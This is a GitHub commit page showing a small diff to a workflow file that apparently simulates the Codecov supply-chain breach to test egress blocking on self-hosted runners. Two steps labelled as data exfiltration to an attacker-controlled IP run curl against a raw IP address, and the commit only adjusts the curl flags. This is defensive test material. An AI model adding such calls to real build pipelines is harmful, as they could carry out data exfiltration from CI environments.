Skip to content

Commit

Permalink
Update arc-secure-by-default.yml
Browse files Browse the repository at this point in the history
  • Loading branch information
varunsh-coder authored Sep 25, 2023
1 parent 211fee2 commit 9459881
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions .github/workflows/arc-secure-by-default.yml
Original file line number Diff line number Diff line change
Expand Up @@ -10,12 +10,12 @@ jobs:

# Codecov Scenario: Exfiltrate data to attacker's IP address
- name: Data Exfiltration To Attacker Controlled IP address
run: curl 104.16.209.12 -L
run: curl 104.16.209.12 --connect-timeout 5
direct-ip-arc:
runs-on: self-hosted
steps:
- uses: actions/checkout@v3

# Codecov Scenario: Exfiltrate data to attacker's IP address
- name: Data Exfiltration To Attacker Controlled IP address
run: curl 104.16.209.12 -L
run: curl 104.16.209.12 --connect-timeout 5

0 comments on commit 9459881

Please sign in to comment.